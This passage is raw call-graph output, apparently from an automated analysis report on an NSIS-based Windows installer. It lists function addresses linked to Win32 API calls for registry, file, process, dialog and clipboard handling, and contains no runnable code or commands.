4978->4982 4984 40483c 4978->4984 4981 40481a MulDiv 4979->4981 4979->4984 4981->4984 4982->4978 4983 4048a6 4986 4048c9 4983->4986 4988 40140b 2 API calls 4983->4988 4984->4983 4985 404978 21 API calls 4984->4985 4987 404898 4985->4987 5001 404151 EnableWindow 4986->5001 4989 4048a8 SetDlgItemTextW 4987->4989 4990 40489d 4987->4990 4988->4986 4989->4983 4993 404978 21 API calls 4990->4993 4992 4048e5 4992->4994 5002 40455f 4992->5002 4993->4983 4994->4947 4996->4940 4997->4966 4998->4951 4999->4968 5000->4976 5001->4992 5003 404572 SendMessageW 5002->5003 5004 40456d 5002->5004 5003->4994 5004->5003 5005 401bca 5006 402b1d 18 API calls 5005->5006 5007 401bd1 5006->5007 5008 402b1d 18 API calls 5007->5008 5009 401bdb 5008->5009 5010 402b3a 18 API calls 5009->5010 5014 401beb 5009->5014 5010->5014 5011 402b3a 18 API calls 5015 401bfb 5011->5015 5012 401c06 5016 402b1d 18 API calls 5012->5016 5013 401c4a 5017 402b3a 18 API calls 5013->5017 5014->5011 5014->5015 5015->5012 5015->5013 5018 401c0b 5016->5018 5019 401c4f 5017->5019 5020 402b1d 18 API calls 5018->5020 5021 402b3a 18 API calls 5019->5021 5023 401c14 5020->5023 5022 401c58 FindWindowExW 5021->5022 5026 401c7a 5022->5026 5024 401c3a SendMessageW 5023->5024 5025 401c1c SendMessageTimeoutW 5023->5025 5024->5026 5025->5026 5027 40194b 5028 402b1d 18 API calls 5027->5028 5029 401952 5028->5029 5030 402b1d 18 API calls 5029->5030 5031 40195c 5030->5031 5032 402b3a 18 API calls 5031->5032 5033 401965 5032->5033 5034 401979 lstrlenW 5033->5034 5035 4019b5 5033->5035 5036 401983 5034->5036 5036->5035 5040 405eea lstrcpynW 5036->5040 5038 40199e 5038->5035 5039 4019ab lstrlenW 5038->5039 5039->5035 5040->5038 5044 4024cc 5045 402b3a 18 API calls 5044->5045 5046 4024d3 5045->5046 5049 405b56 GetFileAttributesW CreateFileW 5046->5049 5048 4024df 5049->5048 4113 1000278d 4114 100027dd 4113->4114 4115 1000279d VirtualProtect 4113->4115 4115->4114 5050 4019cf 5051 402b3a 18 API calls 5050->5051 5052 4019d6 5051->5052 5053 402b3a 18 API calls 5052->5053 5054 4019df 5053->5054 5055 4019e6 lstrcmpiW 5054->5055 5056 4019f8 lstrcmpW 5054->5056 5057 4019ec 5055->5057 5056->5057 4199 401e51 4200 402b3a 18 API calls 4199->4200 4201 401e57 4200->4201 4202 405194 25 API calls 4201->4202 4203 401e61 4202->4203 4217 405665 CreateProcessW 4203->4217 4206 401ec6 CloseHandle 4210 402793 4206->4210 4207 401e77 WaitForSingleObject 4208 401e89 4207->4208 4209 401e9b GetExitCodeProcess 4208->4209 4220 40628d 4208->4220 4211 401eba 4209->4211 4212 401ead 4209->4212 4211->4206 4215 401eb8 4211->4215 4224 405e31 wsprintfW 4212->4224 4215->4206 4218 401e67 4217->4218 4219 405694 CloseHandle 4217->4219 4218->4206 4218->4207 4218->4210 4219->4218 4221 4062aa PeekMessageW 4220->4221 4222 4062a0 DispatchMessageW 4221->4222 4223 401e90 WaitForSingleObject 4221->4223 4222->4221 4223->4208 4224->4215 4299 401752 4300 402b3a 18 API calls 4299->4300 4301 401759 4300->4301 4302 401781 4301->4302 4303 401779 4301->4303 4340 405eea lstrcpynW 4302->4340 4339 405eea lstrcpynW 4303->4339 4306 40177f 4310 40617e 5 API calls 4306->4310 4307 40178c 4308 405935 3 API calls 4307->4308 4309 401792 lstrcatW 4308->4309 4309->4306 4323 40179e 4310->4323 4311 4017da 4313 405b31 2 API calls 4311->4313 4312 40622d 2 API calls 4312->4323 4313->4323 4315 4017b0 CompareFileTime 4315->4323 4316 401870 4317 405194 25 API calls 4316->4317 4320 40187a 4317->4320 4318 405194 25 API calls 4328 40185c 4318->4328 4319 405eea lstrcpynW 4319->4323 4321 403062 46 API calls 4320->4321 4322 40188d 4321->4322 4324 4018a1 SetFileTime 4322->4324 4325 4018b3 CloseHandle 4322->4325 4323->4311 4323->4312 4323->4315 4323->4316 4323->4319 4326 405f0c 18 API calls 4323->4326 4335 4056c6 MessageBoxIndirectW 4323->4335 4336 401847 4323->4336 4338 405b56 GetFileAttributesW CreateFileW 4323->4338 4324->4325 4327 4018c4 4325->4327 4325->4328 4326->4323 4329 4018c9 4327->4329 4330 4018dc 4327->4330 4331 405f0c 18 API calls 4329->4331 4332 405f0c 18 API calls 4330->4332 4333 4018d1 lstrcatW 4331->4333 4334 4018e4 4332->4334 4333->4334 4337 4056c6 MessageBoxIndirectW 4334->4337 4335->4323 4336->4318 4336->4328 4337->4328 4338->4323 4339->4306 4340->4307 4341 402253 4342 402261 4341->4342 4343 40225b 4341->4343 4344 40226f 4342->4344 4346 402b3a 18 API calls 4342->4346 4345 402b3a 18 API calls 4343->4345 4347 402b3a 18 API calls 4344->4347 4349 40227d 4344->4349 4345->4342 4346->4344 4347->4349 4348 402b3a 18 API calls 4350 402286 WritePrivateProfileStringW 4348->4350 4349->4348 5058 4052d3 5059 4052f4 GetDlgItem GetDlgItem GetDlgItem 5058->5059 5060 40547f 5058->5060 5103 404164 SendMessageW 5059->5103 5062 4054b0 5060->5062 5063 405488 GetDlgItem CreateThread CloseHandle 5060->5063 5065 4054db 5062->5065 5066 405500 5062->5066 5067 4054c7 ShowWindow ShowWindow 5062->5067 5063->5062 5064 405365 5070 40536c GetClientRect GetSystemMetrics SendMessageW SendMessageW 5064->5070 5068 40553b 5065->5068 5072 405515 ShowWindow 5065->5072 5073 4054ef 5065->5073 5069 404196 8 API calls 5066->5069 5105 404164 SendMessageW 5067->5105 5068->5066 5079 405549 SendMessageW 5068->5079 5074 40550e 5069->5074 5077 4053db 5070->5077 5078 4053bf SendMessageW SendMessageW 5070->5078 5075 405535 5072->5075 5076 405527 5072->5076 5080 404108 SendMessageW 5073->5080 5082 404108 SendMessageW 5075->5082 5081 405194 25 API calls 5076->5081 5083 4053e0 SendMessageW 5077->5083 5084 4053ee 5077->5084 5078->5077 5079->5074 5085 405562 CreatePopupMenu 5079->5085 5080->5066 5081->5075 5082->5068 5083->5084 5087 40412f 19 API calls 5084->5087 5086 405f0c 18 API calls 5085->5086 5088 405572 AppendMenuW 5086->5088 5089 4053fe 5087->5089 5090 4055a2 TrackPopupMenu 5088->5090 5091 40558f GetWindowRect 5088->5091 5092 405407 ShowWindow 5089->5092 5093 40543b GetDlgItem SendMessageW 5089->5093 5090->5074 5094 4055bd 5090->5094 5091->5090 5095 40542a 5092->5095 5096 40541d ShowWindow 5092->5096 5093->5074 5097 405462 SendMessageW SendMessageW 5093->5097 5098 4055d9 SendMessageW 5094->5098 5104 404164 SendMessageW 5095->5104 5096->5095 5097->5074 5098->5098 5099 4055f6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5098->5099 5101 40561b SendMessageW 5099->5101 5101->5101 5102 405644 GlobalUnlock SetClipboardData CloseClipboard 5101->5102 5102->5074 5103->5064 5104->5093 5105->5065 5106 402454 5107 402c44 19 API calls 5106->5107 5108 40245e 5107->5108 5109 402b1d 18 API calls 5108->5109 5110 402467 5109->5110 5111 40248b RegEnumValueW 5110->5111 5112 40247f RegEnumKeyW 5110->5112 5114 402793 5110->5114 5113 4024a4 RegCloseKey 5111->5113 5111->5114 5112->5113 5113->5114 5116 401ed4 5117 402b3a 18 API calls 5116->5117 5118 401edb 5117->5118 5119 40622d 2 API calls 5118->5119 5120 401ee1 5119->5120 5122 401ef2 5120->5122 5123 405e31 wsprintfW 5120->5123 5123->5122 5124 4022d5 5125 402305 5124->5125 5126 4022da 5124->5126 5128 402b3a 18 API calls 5125->5128 5127 402c44 19 API calls 5126->5127 5129 4022e1 5127->5129 5130 40230c 5128->5130 5131 402b3a 18 API calls 5129->5131 5134 402322 5129->5134 5135 402b7a RegOpenKeyExW 5130->5135 5132 4022f2 RegDeleteValueW RegCloseKey 5131->5132 5132->5134 5139 402ba5 5135->5139 5144 402bf1 5135->5144 5136 402bcb RegEnumKeyW 5137 402bdd RegCloseKey 5136->5137 5136->5139 5140 406254 3 API calls 5137->5140 5138 402c02 RegCloseKey 5138->5144 5139->5136 5139->5137 5139->5138 5141 402b7a 3 API calls 5139->5141 5142 402bed 5140->5142 5141->5139 5143 402c1d RegDeleteKeyW 5142->5143 5142->5144 5143->5144 5144->5134 4364 403c57 4365 403daa 4364->4365 4366 403c6f 4364->4366 4368 403dfb 4365->4368 4369 403dbb GetDlgItem GetDlgItem 4365->4369 4366->4365 4367 403c7b 4366->4367 4370 403c86 SetWindowPos 4367->4370 4371 403c99 4367->4371 4373 403e55 4368->4373 4378 401389 2 API calls 4368->4378 4372 40412f 19 API calls 4369->4372 4370->4371 4375 403cb6 4371->4375 4376 403c9e ShowWindow 4371->4376 4377 403de5 SetClassLongW 4372->4377 4374 40417b SendMessageW 4373->4374 4396 403da5 4373->4396 4403 403e67 4374->4403 4379 403cd8 4375->4379 4380 403cbe DestroyWindow 4375->4380 4376->4375 4381 40140b 2 API calls 4377->4381 4382 403e2d 4378->4382 4384 403cdd SetWindowLongW 4379->4384 4385 403cee 4379->4385 4383 4040d9 4380->4383 4381->4368 4382->4373 4388 403e31 SendMessageW 4382->4388 4394 4040e9 ShowWindow 4383->4394 4383->4396 4384->4396 4386 403d97 4385->4386 4387 403cfa GetDlgItem 4385->4387 4393 404196 8 API calls 4386->4393 4391 403d2a 4387->4391 4392 403d0d SendMessageW IsWindowEnabled 4387->4392 4388->4396 4389 40140b 2 API calls 4389->4403 4390 4040ba DestroyWindow EndDialog 4390->4383 4395 403d2f 4391->4395 4398 403d37 4391->4398 4399 403d7e SendMessageW 4391->4399 4400 403d4a 4391->4400 4392->4391 4392->4396 4393->4396 4394->4396 4438 404108 4395->4438 4397 405f0c 18 API calls 4397->4403 4398->4395 4398->4399 4399->4386 4404 403d52 4400->4404 4405 403d67 4400->4405 4402 40412f 19 API calls 4402->4403 4403->4389 4403->4390 4403->4396 4403->4397 4403->4402 4410 40412f 19 API calls 4403->4410 4425 403ffa DestroyWindow 4403->4425 4408 40140b 2 API calls 4404->4408 4407 40140b 2 API calls 4405->4407 4406 403d65 4406->4386 4409 403d6e 4407->4409 4408->4395 4409->4386 4409->4395 4411 403ee2 GetDlgItem 4410->4411 4412 403ef7 4411->4412 4413 403eff ShowWindow KiUserCallbackDispatcher 4411->4413 4412->4413 4435 404151 EnableWindow 4413->4435 4415 403f29 EnableWindow 4418 403f3d 4415->4418 4416 403f42 GetSystemMenu EnableMenuItem SendMessageW 4417 403f72 SendMessageW 4416->4417 4416->4418 4417->4418 4418->4416 4436 404164 SendMessageW 4418->4436 4437 405eea lstrcpynW 4418->4437 4421 403fa0 lstrlenW 4422 405f0c 18 API calls 4421->4422 4423 403fb6 SetWindowTextW 4422->4423 4424 401389 2 API calls 4423->4424 4424->4403 4425->4383 4426 404014 CreateDialogParamW 4425->4426 4426->4383 4427 404047 4426->4427 4428 40412f 19 API calls 4427->4428 4429 404052 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4428->4429 4430 401389 2 API calls 4429->4430 4431 404098 4430->4431 4431->4396 4432 4040a0 ShowWindow 4431->4432 4433 40417b SendMessageW 4432->4433 4434 4040b8 4433->4434 4434->4383 4435->4415 4436->4418 4437->4421 4439 404115 SendMessageW 4438->4439 4440 40410f 4438->4440 4439->4406 4440->4439 5145 4014d7 5146 402b1d 18 API calls 5145->5146 5147 4014dd Sleep 5146->5147 5149 4029c7 5147->5149 4667 40335a #17 SetErrorMode OleInitialize 4668 406254 3 API calls 4667->4668 4669 40339d SHGetFileInfoW 4668->4669 4740 405eea lstrcpynW 4669->4740 4671 4033c8 GetCommandLineW 4741 405eea lstrcpynW 4671->4741 4673 4033da GetModuleHandleW 4674 4033f2 4673->4674 4675 405962 CharNextW 4674->4675 4676 403401 CharNextW 4675->4676 4684 403411 4676->4684 4677 4034e6 4678 4034fa GetTempPathW 4677->4678 4742 403326 4678->4742 4680 403512 4681 403516 GetWindowsDirectoryW lstrcatW 4680->4681 4682 40356c DeleteFileW 4680->4682 4685 403326 11 API calls 4681->4685 4750 402dbc GetTickCount GetModuleFileNameW 4682->4750 4683 405962 CharNextW 4683->4684 4684->4677 4684->4683 4690 4034e8 4684->4690 4687 403532 4685->4687 4687->4682 4689 403536 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4687->4689 4688 403580 4696 405962 CharNextW 4688->4696 4701 403618 4688->4701 4726 403608 4688->4726 4692 403326 11 API calls 4689->4692 4834 405eea lstrcpynW 4690->4834 4695 403564 4692->4695 4695->4682 4695->4701 4700 40359b 4696->4700 4698 403631 4702 4056c6 MessageBoxIndirectW 4698->4702 4699 403727 4703 4037aa ExitProcess 4699->4703 4708 406254 3 API calls 4699->4708 4706 4035e2 4700->4706 4707 403647 lstrcatW lstrcmpiW 4700->4707 4837 4037c2 4701->4837 4705 40363f ExitProcess 4702->4705 4709 405a3d 18 API calls 4706->4709 4707->4701 4710 403663 CreateDirectoryW SetCurrentDirectoryW 4707->4710 4711 403736 4708->4711 4713 4035ee 4709->4713 4714 403686 4710->4714 4715 40367b 4710->4715 4712 406254 3 API calls 4711->4712 4716 40373f 4712->4716 4713->4701 4835 405eea lstrcpynW 4713->4835 4847 405eea lstrcpynW 4714->4847 4846 405eea lstrcpynW 4715->4846 4719 406254 3 API calls 4716->4719 4721 403748 4719->4721 4723 403796 ExitWindowsEx 4721->4723 4729 403756 GetCurrentProcess 4721->4729 4722 4035fd 4836 405eea lstrcpynW 4722->4836 4723->4703 4727 4037a3 4723->4727 4725 405f0c 18 API calls 4728 4036c5 DeleteFileW 4725->4728 4780 4038b4 4726->4780 4730 40140b 2 API calls 4727->4730 4731 4036d2 CopyFileW 4728->4731 4737 403694 4728->4737 4734 403766 4729->4734 4730->4703 4731->4737 4732 40371b 4735 405d84 40 API calls 4732->4735 4733 405d84 40 API calls 4733->4737 4734->4723 4735->4701 4736 405f0c 18 API calls 4736->4737 4737->4725 4737->4732 4737->4733 4737->4736 4738 405665 2 API calls 4737->4738 4739 403706 CloseHandle 4737->4739 4738->4737 4739->4737 4740->4671 4741->4673 4743 40617e 5 API calls 4742->4743 4745 403332 4743->4745 4744 40333c 4744->4680 4745->4744 4746 405935 3 API calls 4745->4746 4747 403344 CreateDirectoryW 4746->4747 4848 405b85 4747->4848 4852 405b56 GetFileAttributesW CreateFileW 4750->4852 4752 402dff 4779 402e0c 4752->4779 4853 405eea lstrcpynW 4752->4853 4754 402e22 4755 405981 2 API calls 4754->4755 4756 402e28 4755->4756 4854 405eea lstrcpynW 4756->4854 4758 402e33 GetFileSize 4759 402f34 4758->4759 4777 402e4a 4758->4777 4760 402d1a 33 API calls 4759->4760 4761 402f3b 4760->4761 4764 402f77 GlobalAlloc 4761->4764 4761->4779 4856 40330f SetFilePointer 4761->4856 4762 4032f9 ReadFile 4762->4777 4763 402fcf 4766 402d1a 33 API calls 4763->4766 4765 402f8e 4764->4765 4769 405b85 2 API calls 4765->4769 4766->4779 4768 402f58 4770 4032f9 ReadFile 4768->4770 4772 402f9f CreateFileW 4769->4772 4773 402f63 4770->4773 4771 402d1a 33 API calls 4771->4777 4774 402fd9 4772->4774 4772->4779 4773->4764 4773->4779 4855 40330f SetFilePointer 4774->4855 4776 402fe7 4778 403062 46 API calls 4776->4778 4777->4759 4777->4762 4777->4763 4777->4771 4777->4779 4778->4779 4779->4688 4781 406254 3 API calls 4780->4781 4782 4038c8 4781->4782 4783 4038e0 4782->4783 4784 4038ce 4782->4784 4785 405db7 3 API calls 4783->4785 4866 405e31 wsprintfW 4784->4866 4786 403910 4785->4786 4787 40392f lstrcatW 4786->4787 4789 405db7 3 API calls 4786->4789 4790 4038de 4787->4790 4789->4787 4857 403b8a 4790->4857 4793 405a3d 18 API calls 4794 403961 4793->4794 4795 4039f5 4794->4795 4797 405db7 3 API calls 4794->4797 4796 405a3d 18 API calls 4795->4796 4798 4039fb 4796->4798 4799 403993 4797->4799 4800 403a0b LoadImageW 4798->4800 4801 405f0c 18 API calls 4798->4801 4799->4795 4806 4039b4 lstrlenW 4799->4806 4807 405962 CharNextW 4799->4807 4802 403ab1 4800->4802 4803 403a32 RegisterClassW 4800->4803 4801->4800 4805 40140b 2 API calls 4802->4805 4804 403a68 SystemParametersInfoW CreateWindowExW 4803->4804 4833 403abb 4803->4833 4804->4802 4810 403ab7 4805->4810 4808 4039c2 lstrcmpiW 4806->4808 4809 4039e8 4806->4809 4811 4039b1 4807->4811 4808->4809 4812 4039d2 GetFileAttributesW 4808->4812 4813 405935 3 API calls 4809->4813 4815 403b8a 19 API calls 4810->4815 4810->4833 4811->4806 4814 4039de 4812->4814 4816 4039ee 4813->4816 4814->4809 4817 405981 2 API calls 4814->4817 4818 403ac8 4815->4818 4867 405eea lstrcpynW 4816->4867 4817->4809 4820 403ad4 ShowWindow LoadLibraryW 4818->4820 4821 403b57 4818->4821 4823 403af3 LoadLibraryW 4820->4823 4824 403afa GetClassInfoW 4820->4824 4868 405267 OleInitialize 4821->4868 4823->4824 4826 403b24 DialogBoxParamW 4824->4826 4827 403b0e GetClassInfoW RegisterClassW 4824->4827 4825 403b5d 4829 403b61 4825->4829 4830 403b79 4825->4830 4828 40140b 2 API calls 4826->4828 4827->4826 4828->4833 4832 40140b 2 API calls 4829->4832 4829->4833 4831 40140b 2 API calls 4830->4831 4831->4833 4832->4833 4833->4701 4834->4678 4835->4722 4836->4726 4838 4037d3 CloseHandle 4837->4838 4839 4037dd 4837->4839 4838->4839 4840 4037f1 4839->4840 4841 4037e7 CloseHandle 4839->4841 4876 40381f 4840->4876 4841->4840 4844 405772 71 API calls 4845 403621 OleUninitialize 4844->4845 4845->4698 4845->4699 4846->4714 4847->4737 4849 405b92 GetTickCount GetTempFileNameW 4848->4849 4850 403358 4849->4850 4851 405bc8 4849->4851 4850->4680 4851->4849 4851->4850 4852->4752 4853->4754 4854->4758 4855->4776 4856->4768 4858 403b9e 4857->4858 4875 405e31 wsprintfW 4858->4875 4860 403c0f 4861 405f0c 18 API calls 4860->4861 4862 403c1b SetWindowTextW 4861->4862 4863 40393f 4862->4863 4864 403c37 4862->4864 4863->4793 4864->4863 4865 405f0c 18 API calls 4864->4865 4865->4864 4866->4790 4867->4795 4869 40417b SendMessageW 4868->4869 4870 40528a 4869->4870 4873 401389 2 API calls 4870->4873 4874 4052b1 4870->4874 4871 40417b SendMessageW 4872 4052c3 OleUninitialize 4871->4872 4872->4825 4873->4870 4874->4871 4875->4860 4877 40382d 4876->4877 4878 4037f6 4877->4878 4879 403832 FreeLibrary GlobalFree 4877->4879 4878->4844 4879->4878 4879->4879 5150 40155b 5151 40296d 5150->5151 5154 405e31 wsprintfW 5151->5154 5153 402972 5154->5153 3811 4023e0 3822 402c44 3811->3822 3813 4023ea 3826 402b3a 3813->3826 3816 4023fe RegQueryValueExW 3818 402424 RegCloseKey 3816->3818 3819 40241e 3816->3819 3817 402793 3818->3817 3819->3818 3832 405e31 wsprintfW 3819->3832 3823 402b3a 18 API calls 3822->3823 3824 402c5d 3823->3824 3825 402c6b RegOpenKeyExW 3824->3825 3825->3813 3827 402b46 3826->3827 3833 405f0c 3827->3833 3830 4023f3 3830->3816 3830->3817 3832->3818 3850 405f19 3833->3850 3834 406164 3835 402b67 3834->3835 3867 405eea lstrcpynW 3834->3867 3835->3830 3851 40617e 3835->3851 3837 405fcc GetVersion 3837->3850 3838 406132 lstrlenW 3838->3850 3840 405f0c 10 API calls 3840->3838 3843 406047 GetSystemDirectoryW 3843->3850 3844 40605a GetWindowsDirectoryW 3844->3850 3845 40617e 5 API calls 3845->3850 3846 405f0c 10 API calls 3846->3850 3847 4060d3 lstrcatW 3847->3850 3848 40608e SHGetSpecialFolderLocation 3849 4060a6 SHGetPathFromIDListW CoTaskMemFree 3848->3849 3848->3850 3849->3850 3850->3834 3850->3837 3850->3838 3850->3840 3850->3843 3850->3844 3850->3845 3850->3846 3850->3847 3850->3848 3860 405db7 RegOpenKeyExW 3850->3860 3865 405e31 wsprintfW 3850->3865 3866 405eea lstrcpynW 3850->3866 3852 40618b 3851->3852 3854 4061f4 CharNextW 3852->3854 3855 406201 3852->3855 3858 4061e0 CharNextW 3852->3858 3859 4061ef CharNextW 3852->3859 3868 405962 3852->3868 3853 406206 CharPrevW 3853->3855 3854->3852 3854->3855 3855->3853 3857 406227 3855->3857 3857->3830 3858->3852 3859->3854 3861 405e2b 3860->3861 3862 405deb RegQueryValueExW 3860->3862 3861->3850 3863 405e0c RegCloseKey 3862->3863 3863->3861 3865->3850 3866->3850 3867->3835 3869 405968 3868->3869 3870 40597e 3869->3870 3871 40596f CharNextW 3869->3871 3870->3852 3871->3869 5162 4042e0 5163 4042ee 5162->5163 5164 40412f 19 API calls 5163->5164 5165 40434b 5164->5165 5166 40412f 19 API calls 5165->5166 5167 404358 CheckDlgButton 5166->5167 5175 404151 EnableWindow 5167->5175 5169 404376 GetDlgItem 5176 404164 SendMessageW 5169->5176 5171 40438c SendMessageW 5172 4043b2 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5171->5172 5173 4043a9 GetSysColor 5171->5173 5174 404558 5172->5174 5173->5172 5175->5169 5176->5171 5177 401ce5 GetDlgItem GetClientRect 5178 402b3a 18 API calls 5177->5178 5179 401d17 LoadImageW SendMessageW 5178->5179 5180 401d35 DeleteObject 5179->5180 5181 4029c7 5179->5181 5180->5181 4094 40206a 4095 402b3a 18 API calls 4094->4095 4096 402071 4095->4096 4097 402b3a 18 API calls 4096->4097 4098 40207b 4097->4098 4099 402b3a 18 API calls 4098->4099 4100 402084 4099->4100 4101 402b3a 18 API calls 4100->4101 4102 40208e 4101->4102 4103 402b3a 18 API calls 4102->4103 4104 402098 4103->4104 4105 4020ac CoCreateInstance 4104->4105 4106 402b3a 18 API calls 4104->4106 4109 4020cb 4105->4109 4106->4105 4108 402197 4109->4108 4110 401423 4109->4110 4111 405194 25 API calls 4110->4111 4112 401431 4111->4112 4112->4108 5182 4028ea 5185 405eea lstrcpynW 5182->5185 5184 4028f0 5185->5184 5186 40156b 5187 401584 5186->5187 5188 40157b ShowWindow 5186->5188 5189 401592 ShowWindow 5187->5189 5190 4029c7 5187->5190 5188->5187 5189->5190 5191 40296c 5193 402972 5191->5193 5194 405e31 wsprintfW 5191->5194 5194->5193 5195 4024ee 5196 4024f3 5195->5196 5197 40250c 5195->5197 5200 402b1d 18 API calls 5196->5200 5198 402512 5197->5198 5199 40253e 5197->5199 5201 402b3a 18 API calls 5198->5201 5202 402b3a 18 API calls 5199->5202 5205 4024fa 5200->5205 5203 402519 WideCharToMultiByte lstrlenA 5201->5203 5204 402545 lstrlenW 5202->5204 5203->5205 5204->5205 5206 402567 WriteFile 5205->5206 5207 402793 5205->5207 5206->5207 5208 4018ef 5209 401926 5208->5209 5210 402b3a 18 API calls 5209->5210 5211 40192b 5210->5211 5212 405772 71 API calls 5211->5212 5213 401934 5212->5213 5214 402770 5215 402b3a 18 API calls 5214->5215 5216 402777 FindFirstFileW 5215->5216 5217 40279f 5216->5217 5220 40278a 5216->5220 5218 4027a8 5217->5218 5222 405e31 wsprintfW 5217->5222 5218->5220 5223 405eea lstrcpynW 5218->5223 5222->5218 5223->5220 5224 4014f1 SetForegroundWindow 5225 4029c7 5224->5225 5226 403872 5227 40387d 5226->5227 5228 403881 5227->5228 5229 403884 GlobalAlloc 5227->5229 5229->5228 5230 4018f2 5231 402b3a 18 API calls 5230->5231 5232 4018f9 5231->5232 5233 4056c6 MessageBoxIndirectW 5232->5233 5234 401902 5233->5234 4351 402573 4352 402b1d 18 API calls 4351->4352 4356 402582 4352->4356 4353 4026a0 4354 4025c8 ReadFile 4354->4353 4354->4356 4355 405bd9 ReadFile 4355->4356 4356->4353 4356->4354 4356->4355 4357 4026a2 4356->4357 4358 402608 MultiByteToWideChar 4356->4358 4360 40262e SetFilePointer MultiByteToWideChar 4356->4360 4361 4026b3 4356->4361 4363 405e31 wsprintfW 4357->4363 4358->4356 4360->4356 4361->4353 4362 4026d4 SetFilePointer 4361->4362 4362->4353 4363->4353 5235 401df3 5236 402b3a 18 API calls 5235->5236 5237 401df9 5236->5237 5238 402b3a 18 API calls 5237->5238 5239 401e02 5238->5239 5240 402b3a 18 API calls 5239->5240 5241 401e0b 5240->5241 5242 402b3a 18 API calls 5241->5242 5243 401e14 5242->5243 5244 401423 25 API calls 5243->5244 5245 401e1b ShellExecuteW 5244->5245 5246 401e4c 5245->5246 4639 4026f9 4640 402700 4639->4640 4641 402972 4639->4641 4642 402b1d 18 API calls 4640->4642 4643 40270b 4642->4643 4644 402712 SetFilePointer 4643->4644 4644->4641 4645 402722 4644->4645 4647 405e31 wsprintfW 4645->4647 4647->4641 5273 1000103d 5274 1000101b 8 API calls 5273->5274 5275 10001056 5274->5275 5276 40427d lstrlenW 5277 40429c 5276->5277 5278 40429e WideCharToMultiByte 5276->5278 5277->5278 5279 402c7f 5280 402c91 SetTimer 5279->5280 5281 402caa 5279->5281 5280->5281 5282 402cf8 5281->5282 5283 402cfe MulDiv 5281->5283 5284 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5283->5284 5284->5282 5286 4014ff 5287 401507 5286->5287 5289 40151a 5286->5289 5288 402b1d 18 API calls 5287->5288 5288->5289 5290 401000 5291 401037 BeginPaint GetClientRect 5290->5291 5294 40100c DefWindowProcW 5290->5294 5292 4010f3 5291->5292 5296 401073 CreateBrushIndirect FillRect DeleteObject 5292->5296 5297 4010fc 5292->5297 5295 401179 5294->5295 5296->5292 5298 401102 CreateFontIndirectW 5297->5298 5299 401167 EndPaint 5297->5299 5298->5299 5300 401112 6 API calls 5298->5300 5299->5295 5300->5299 5301 401a00 5302 402b3a 18 API calls 5301->5302 5303 401a09 ExpandEnvironmentStringsW 5302->5303 5304 401a30 5303->5304 5305 401a1d 5303->5305 5305->5304 5306 401a22 lstrcmpW 5305->5306 5306->5304 5307 401b01 5308 402b3a 18 API calls 5307->5308 5309 401b08 5308->5309 5310 402b1d 18 API calls 5309->5310 5311 401b11 wsprintfW 5310->5311 5312 4029c7 5311->5312 5313 100018c1 5314 10001243 3 API calls 5313->5314 5315 100018e7 5314->5315 5316 10001243 3 API calls 5315->5316 5317 100018ef 5316->5317 5318 10001243 3 API calls 5317->5318 5321 10001931 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5317->5321 5319 10001916 5318->5319 5320 1000191f GlobalFree 5319->5320 5320->5321 5322 10001280 2 API calls 5321->5322 5323 10001aad GlobalFree GlobalFree 5322->5323 5324 10002a43 5325 10002a5b 5324->5325 5326 100015a7 2 API calls 5325->5326 5327 10002a76 5326->5327 5328 404583 5329 404593 5328->5329 5330 4045b9 5328->5330 5331 40412f 19 API calls 5329->5331 5332 404196 8 API calls 5330->5332 5333 4045a0 SetDlgItemTextW 5331->5333 5334 4045c5 5332->5334 5333->5330 4053 405108 4054 405118 4053->4054 4055 40512c 4053->4055 4056 40511e 4054->4056 4066 405175 4054->4066 4057 405134 IsWindowVisible 4055->4057 4061 405154 4055->4061 4067 40417b 4056->4067 4060 405141 4057->4060 4057->4066 4058 40517a CallWindowProcW 4062 405128 4058->4062 4070 404a5e SendMessageW 4060->4070 4061->4058 4075 404ade 4061->4075 4066->4058 4068 404193 4067->4068 4069 404184 SendMessageW 4067->4069 4068->4062 4069->4068 4071 404a81 GetMessagePos ScreenToClient SendMessageW 4070->4071 4072 404abd SendMessageW 4070->4072 4073 404ab5 4071->4073 4074 404aba 4071->4074 4072->4073 4073->4061 4074->4072 4084 405eea lstrcpynW 4075->4084 4077 404af1 4085 405e31 wsprintfW 4077->4085 4079 404afb 4086 40140b 4079->4086 4083 404b0b 4083->4066 4084->4077 4085->4079 4090 401389 4086->4090 4089 405eea lstrcpynW 4089->4083 4092 401390 4090->4092 4091 4013fe 4091->4089 4092->4091 4093 4013cb MulDiv SendMessageW 4092->4093 4093->4092 5335 401f08 5336 402b3a 18 API calls 5335->5336 5337 401f0f GetFileVersionInfoSizeW 5336->5337 5338 401f36 GlobalAlloc 5337->5338 5339 401f8c 5337->5339 5338->5339 5340 401f4a GetFileVersionInfoW 5338->5340 5340->5339 5341 401f59 VerQueryValueW 5340->5341 5341->5339 5342 401f72 5341->5342 5346 405e31 wsprintfW 5342->5346 5344 401f7e 5347 405e31 wsprintfW 5344->5347 5346->5344 5347->5339 5355 1000224c 5356 100022b1 5355->5356 5357 100022e7 5355->5357 5356->5357 5358 100022c3 GlobalAlloc 5356->5358 5358->5356 5359 100016ce 5360 100016fd 5359->5360 5361 10001b3e 24 API calls 5360->5361 5362 10001704 5361->5362 5363 10001717 5362->5363 5364 1000170b 5362->5364 5366 10001721 5363->5366 5367 1000173e 5363->5367 5365 10001280 2 API calls 5364->5365 5368 10001715 5365->5368 5369 10001555 3 API calls 5366->5369 5370 10001744 5367->5370 5371 10001768 5367->5371 5374 10001726 5369->5374 5372 100015cc 3 API calls 5370->5372 5373 10001555 3 API calls 5371->5373 5375 10001749 5372->5375 5373->5368 5376 100015cc 3 API calls 5374->5376 5377 10001280 2 API calls 5375->5377 5378 1000172c 5376->5378 5379 1000174f GlobalFree 5377->5379 5380 10001280 2 API calls 5378->5380 5379->5368 5381 10001763 GlobalFree 5379->5381 5382 10001732 GlobalFree 5380->5382 5381->5368 5382->5368 4116 404b10 GetDlgItem GetDlgItem 4117 404b62 7 API calls 4116->4117 4125 404d7b 4116->4125 4118 404c05 DeleteObject 4117->4118 4119 404bf8 SendMessageW 4117->4119 4120 404c0e 4118->4120 4119->4118 4121 404c45 4120->4121 4123 404c1d 4120->4123 4172 40412f 4121->4172 4122 404e5f 4127 